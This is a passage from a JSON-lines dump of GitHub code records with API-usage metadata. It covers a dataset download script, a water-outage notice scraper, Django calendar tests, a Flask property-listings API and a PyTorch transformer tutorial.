"models.ProductType.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 164, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 172, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 172, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 172, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 173, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 174, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 203, "usage_type": "argument"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 213, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 213, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 219, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 222, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 224, "usage_type": "name"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 232, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 237, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 239, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 241, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 242, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 247, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 253, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 260, "usage_type": "call"}, {"api_name": "models.Product.objects.get_object_or_404get", "line_number": 266, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 266, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 266, "usage_type": "name"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 272, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 272, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 272, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 276, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 276, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 282, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 282, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 282, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 293, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 296, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 298, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 317, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 318, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 320, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 329, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 335, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 335, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 337, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 338, "usage_type": "call"}, {"api_name": "forms.AddCategoryForm", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 351, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 351, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 351, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 353, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 354, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 342, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 359, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 359, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 360, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 365, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 365, "usage_type": "argument"}, {"api_name": "models.Product.objects.filter", "line_number": 366, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 367, "usage_type": "argument"}, {"api_name": "models.Product.objects", "line_number": 366, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 366, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 367, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 367, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 367, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 369, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 375, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 375, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 385, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 372, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 396, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 396, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 397, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 388, "usage_type": "name"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 404, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 411, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 413, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 417, "usage_type": "call"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 400, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 431, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 431, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 431, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 433, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 434, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 436, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 422, "usage_type": "name"}]} +{"seq_id": "73946671847", "text": "import argparse\nimport pathlib\nimport shutil\nimport urllib.request\nimport tarfile\nimport tempfile\nimport time\n\nglobal start_time\n\n\ndef progress(count, block_size, total_size):\n global start_time\n if count == 0:\n start_time = time.time()\n return\n duration = time.time() - start_time\n progress_size = int(count * block_size)\n speed = int(progress_size / (1024 * duration))\n percent = int(count * block_size * 100 / total_size)\n print(\"%d%%, %d MB, %d KB/s, total time: %d seconds\" % (percent, progress_size / (1024 * 1024), speed, duration), end=\"\\r\")\n\n\ndef unpack(tarname: pathlib.Path, destination: pathlib.Path):\n # recursive function to unpack all tar.gz files in a directory\n print(\"unpacking \", tarname, destination)\n if tarname.suffixes != [\".tar\", \".gz\"]:\n # stop if this is not a compressed directory\n return\n tar = tarfile.open(tarname, \"r:gz\")\n tar.extractall(path=destination)\n tar.close()\n\n # for each file in destination: call unpack again\n outdir = destination / tarname.name.replace(\".tar.gz\", \"\")\n\n for file in outdir.iterdir():\n unpack(file, outdir)\n\n\ndef move_and_unpack_data(tmpdir: pathlib.Path, src_dir: str, filename: str, unpack_data: bool):\n data_src = tmpdir / src_dir / filename\n data_dst = pathlib.Path(\".\")\n shutil.copy(data_src, data_dst)\n\n if unpack_data:\n unpack(data_dst / filename, data_dst.parent)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--unpack\",\n help=\"If set, unpack all compressed subdirectories as well. This will require approx. 30 GB of disk space.\",\n action=\"store_true\"\n )\n\n unpack_data = parser.parse_args().unpack\n download_path = \"https://cme.h-its.org/exelixis/material/simulation_study.tar.gz\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n print(\"Downloading data from \", download_path)\n filename, _ = urllib.request.urlretrieve(url=download_path, reporthook=progress)\n\n print(\"\\nUnpacking data\")\n tar = tarfile.open(filename, \"r:gz\")\n tar.extractall(path=tmpdir)\n tar.close()\n\n tmpdir = pathlib.Path(tmpdir)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data\", filename=\"input_data.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"dataframes.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"training_results.tar.gz\", unpack_data=unpack_data)\n", "repo_name": "tschuelia/SimulationStudy", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 2600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 44, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 63, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 63, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 66, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "5948266579", "text": "from datetime import datetime\nfrom urllib.parse import urljoin\nfrom app.scrapers.base import AbstractProvider\n\n\n# TODO: unify scrapping and parsing\n\nclass GWP(AbstractProvider):\n \"\"\"GWP water provider class\"\"\"\n\n TYPE = 'water'\n ROOT_URL = 'https://www.gwp.ge'\n URLS = [\n {\"url\": urljoin(ROOT_URL, '/ka/dagegmili'), \"emergency\": False},\n {\"url\": urljoin(ROOT_URL, '/ka/gadaudebeli'), \"emergency\": True}\n ]\n\n async def scrap_notifications(self) -> list:\n \"\"\"Scraps notifications based on their type from webpage\"\"\"\n\n notifications = []\n\n for item in self.URLS:\n url = item.get(\"url\")\n emergency = item.get(\"emergency\")\n soup = await self.request_soup(url)\n outages_table = soup.find(\"table\", {\"class\": \"samushaoebi\"})\n outages_blocks = outages_table.find_all('tr')\n\n for item in outages_blocks:\n date = datetime.strptime(item.find(\"span\", {\"style\": \"color:#f00000\"}).text, \"%d/%m/%Y\")\n\n if date >= datetime.now().replace(hour=0, minute=0, second=0, microsecond=0):\n title = item.find_all(\"a\")[1].get_text(strip=True)\n link = urljoin(self.ROOT_URL, item.a.get(\"href\"))\n notifications.append(\n {\n \"type\": self.TYPE,\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"title\": title,\n \"emergency\": emergency,\n \"link\": link,\n }\n )\n\n return notifications\n\n async def parse_notifications_info(self, notifications: list) -> list: # noqa: C901\n \"\"\"Parses info from notifications\"\"\"\n\n notifications_info = []\n\n for notification in notifications:\n\n url = notification.get('link')\n soup = await self.request_soup(url)\n\n type = notification.get(\"type\")\n date = notification.get('date')\n title = notification.get('title')\n\n emergency = notification.get(\"emergency\")\n\n # For emergency outages\n\n if emergency:\n outage_text = soup.css.select(\".initial > ul > li > p\")\n for i in outage_text:\n if i.get_text(strip=True) != '':\n info = i.get_text(strip=True).replace(\"\\xa0\", \" \")\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n # For planned outages\n\n else:\n outage_text = soup.css.select(\".news-details > p\")\n temp = []\n for i in outage_text:\n if i.get_text(strip=True) != '':\n temp.append(i.get_text(strip=True).replace(\"\\xa0\", \" \"))\n\n info = \"\".join(temp[1:-2])\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n\n return notifications_info\n", "repo_name": "roaddust2/outages-ge-bot", "sub_path": "app/scrapers/gwp.py", "file_name": "gwp.py", "file_ext": "py", "file_size_in_byte": 3524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.scrapers.base.AbstractProvider", "line_number": 8, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "14196435929", "text": "from django.test import TestCase\nfrom django.utils import timezone\nfrom util.factories import CalendarFactory, EventFactory\n\n\nclass CalendarTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_default(self):\n # Ensure default calendar exists when user profile is created\n self.assertIsNotNone(self.calendar)\n\n # Test the default values of the calendar are correct\n self.assertEqual(self.calendar.owner, self.profile)\n self.assertEqual(self.calendar.privacy, 0)\n self.assertEqual(str(self.calendar),\n str(self.profile) + ' -> ' + self.calendar.title)\n\n def test_create(self):\n # Valid data for calendar creation\n data = {\n 'owner': self.profile,\n 'title': 'Personal',\n 'color': '#420BAE',\n 'privacy': 420\n }\n\n # Create the calendar with the given data\n calendar = CalendarFactory(\n owner=data['owner'],\n title=data['title'],\n color=data['color'],\n privacy=data['privacy']\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(calendar, field))\n\n\nclass EventTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_create(self):\n # Valid data for an event\n data = {\n 'calendar': self.calendar,\n 'title': \"JoJo's Bizarre Adventure\",\n 'start': timezone.now(),\n 'end': timezone.now() + timezone.timedelta(hours=5),\n 'location': 'Great Britain',\n 'description': \"JoJo's Bizarre Adventure tells the story of \"\n \"the Joestar family, a family whose various members \"\n \"discover they are destined to take down supernatural \"\n \"foes using unique powers that they find they possess.\"\n }\n\n # Create the event\n event = EventFactory(\n calendar=data['calendar'],\n title=data['title'],\n start=data['start'],\n end=data['end'],\n location=data['location'],\n description=data['description'],\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(event, field))\n\n # Serialize the event\n serialized_data = event.serialize()\n\n # Ensure serialized data is correct\n for field in data:\n # Start and end times should be formatted\n if field == 'start':\n self.assertEqual(event.start.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'end':\n self.assertEqual(event.end.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'calendar':\n pass\n else:\n self.assertEqual(getattr(event, field), serialized_data[field])\n\n # Test unicode representation\n self.assertEqual(\n \"%s -> %s : %s -> %s\" % (event.calendar, event.title, event.start, event.end,),\n unicode(event)\n )\n\n def test_interval(self):\n event = EventFactory()\n interval = event.as_interval\n self.assertEqual(event.start, interval.start)\n self.assertEqual(event.end, interval.end)\n\n def test_happens_when(self):\n now = timezone.now()\n onehr = timezone.timedelta(hours=1)\n\n # Test in range\n inrange = EventFactory(\n start=now - onehr,\n end=now + onehr,\n )\n self.assertTrue(inrange.happens_when(now))\n\n # Test before\n before = EventFactory(\n start=now - 2 * onehr,\n end=now - onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge before\n before = EventFactory(\n start=now - onehr,\n end=now,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test after\n before = EventFactory(\n start=now + onehr,\n end=now + 2 * onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge after\n before = EventFactory(\n start=now,\n end=now + onehr,\n )\n self.assertFalse(before.happens_when(now))\n", "repo_name": "sudo-woodo/hitmeup", "sub_path": "ourcalendar/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 4612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 9, "usage_type": "call"}, {"api_name": "util.factories.CalendarFactory", "line_number": 32, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 44, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 56, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 65, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 102, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 108, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 109, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 109, "usage_type": "name"}, {"api_name": "util.factories.EventFactory", "line_number": 112, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 126, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 133, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "36953897908", "text": "import os\nimport dumper\nfrom flask import Flask, jsonify, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom geojson import Feature, Point, FeatureCollection\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\ndb = SQLAlchemy(app)\ndb.reflect()\n\nclass Listing(db.Model):\n __tablename__ = 'listings'\n\nfeat_props= (\"id\", \"price\", \"street\", \"status\", \"bedrooms\", \"bathrooms\", \"sq_ft\")\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/listings')\ndef listings():\n l_query= Listing.query\n min_price= request.args.get('min_price', type=int)\n if min_price is not None:\n l_query= l_query.filter(Listing.price >= min_price)\n max_price= request.args.get('max_price', type=int)\n if max_price is not None:\n l_query= l_query.filter(Listing.price <= max_price)\n\n min_bed= request.args.get('min_bed', type=int)\n if min_bed is not None:\n l_query= l_query.filter(Listing.bedrooms >= min_bed)\n max_bed= request.args.get('max_bed', type=int)\n if max_bed is not None:\n l_query= l_query.filter(Listing.bedrooms <= max_bed)\n\n min_bath= request.args.get('min_bath', type=int)\n if min_bath is not None:\n l_query= l_query.filter(Listing.bathrooms >= min_bath)\n max_bath= request.args.get('max_bath', type=int)\n if max_bath is not None:\n l_query= l_query.filter(Listing.bathrooms <= max_bath)\n\n features= list()\n for entry in l_query.all():\n feature = Feature(geometry=Point((entry.long, entry.lat)))\n feature.properties= {k:getattr(entry, k) for k in feat_props}\n features.append(feature)\n \n retcode= jsonify(FeatureCollection(features))\n return(retcode)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "leed25d/od_listings", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "geojson.Feature", "line_number": 47, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "geojson.FeatureCollection", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "74773847527", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is [here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom torch.utils.data import DataLoader \nfrom tqdm import tqdm\n\nfrom config import get_config, get_device, get_model_folder\nfrom dataset8 import get_ds8, get_testing_ds8, Dataset8\nfrom model8 import Transformer8, build_transformer8\nfrom utils import reload_model, save_model, load_trained_model\n\n\ndef build_model8(config: dict, vocab_tgt_len: int) -> Transformer8:\n model = build_transformer8(vocab_tgt_len,\n d_model=config['d_model'], N=config['N'], h=config['h'], block_size=config['block_size'], dropout=config['dropout'], d_ff=config['d_ff'])\n return model\n\n\ndef train_model8(config: dict):\n # hyperparameters\n max_iters = 5000\n eval_interval = 100\n eval_iters = 200\n total_loss = 0\n initial_epoch = 0\n global_step = 0\n\n torch.manual_seed(1337)\n\n device = get_device()\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n transformer = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n # print the number of parameters in the model\n print(sum(p.numel() for p in transformer.parameters())/1e6, 'M parameters')\n\n # create a PyTorch optimizer\n optimizer = torch.optim.AdamW(transformer.parameters(), lr=config['lr'])\n\n transformer, initial_epoch, optimizer, global_step = reload_model(\n config, transformer, optimizer, initial_epoch, global_step)\n\n for epoch in range(initial_epoch, config['num_epochs']):\n if (device == 'cuda'):\n torch.cuda.empty_cache()\n\n transformer.train() # moved inside for run_validation at each step\n\n batch_iterator = tqdm(train_dataloader, desc=f'Processing epoch {epoch:02d}')\n # for iter, batch in enumerate(batch_iterator):\n # if (iter == max_iters):\n # break\n for iter in range(max_iters):\n\n # every once in a while evaluate the loss on train and val sets\n if (iter % eval_interval == 0 or iter == max_iters - 1) and (iter > 0):\n losses = evaluate_model8(transformer, val_dataloader, eval_iters, device, train_ds, val_ds)\n batch_iterator.write(f\"step {iter}: train loss {losses['train']:.4f}, val loss {losses['val']:.4f}\")\n\n # sample a batch of data\n # xb, yb = batch\n xb, yb = train_ds.get_batch()\n\n # evaluate the loss\n logits, loss = transformer(xb.to(device), yb.to(device))\n optimizer.zero_grad(set_to_none=True)\n loss.backward()\n optimizer.step()\n\n # Save the model at the end of every epoch\n save_model(config, transformer, optimizer, epoch, global_step)\n\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer_tgt.decode(transformer.generate(context, max_new_tokens=2000)[0].tolist()))\n\n\n@torch.no_grad()\ndef evaluate_model8(transformer: Transformer8, val_dataloader: DataLoader, eval_iters: int, device, train_ds: Dataset8, val_ds: Dataset8):\n\n out = {'train':0, 'val': 0}\n transformer.eval()\n\n tmp = {'train':train_ds, 'val': val_ds}\n for key, value in tmp.items():\n losses = torch.zeros(eval_iters)\n for k in range(eval_iters):\n X, Y = value.get_batch()\n logits, loss = transformer(X.to(device), Y.to(device))\n losses[k] = loss.item()\n out[key] = losses.mean()\n\n # losses = torch.zeros(eval_iters)\n # for k, batch in enumerate(val_dataloader):\n # if k == eval_iters:\n # break\n # X, Y = batch\n # logits, loss = transformer(X.to(device), Y.to(device))\n # losses[k] = loss.item()\n # out['val'] = losses.mean()\n\n transformer.train()\n return out\n\ndef translate8(config: dict, sentence: str):\n device = get_device()\n\n model_folder = get_model_folder(config)\n if not Path.exists(Path(model_folder)):\n raise ValueError(f\"{model_folder} model_folder does not exist\")\n\n tokenizer = get_testing_ds8(config, model_folder)\n model = build_model8(config, tokenizer.get_vocab_size()).to(device)\n\n # Load the pretrained weights\n model = load_trained_model(config, model)\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer.decode(model.generate(context, max_new_tokens=2000)[0].tolist()))\n\ndef debug_code_model8(config: dict, device):\n config['model'] = \"model7\"\n config['datasource'] = \"translate\"\n config['lang_src'] = \"en\"\n config['lang_tgt'] = \"fr\"\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, test_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n model = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n print(model)\n model.train()\n\n\nif __name__ == '__main__':\n # warnings.filterwarnings('ignore')\n config = get_config()\n device = get_device()\n debug_code_model8(config, device)\n", "repo_name": "prorates/pytorch-transformer-tutorials", "sub_path": "tutorial8.py", "file_name": "tutorial8.py", "file_ext": "py", "file_size_in_byte": 5361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "model8.build_transformer8", "line_number": 18, "usage_type": "call"}, {"api_name": "model8.Transformer8", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.manual_seed", "line_number": 32, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 34, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "dataset8.get_ds8", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.reload_model", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.save_model", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 83, "usage_type": "attribute"}, {"api_name": "model8.Transformer8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "name"}, {"api_name": "dataset8.Dataset8", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 87, "usage_type": "call"}, {"api_name": "config.get_device", "line_number": 115, "usage_type": "call"}, {"api_name": "config.get_model_folder", "line_number": 117, "usage_type": "call"}, {"api_name": "pathlib.Path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 118, "usage_type": "name"}, {"api_name": "dataset8.get_testing_ds8", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.load_trained_model", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 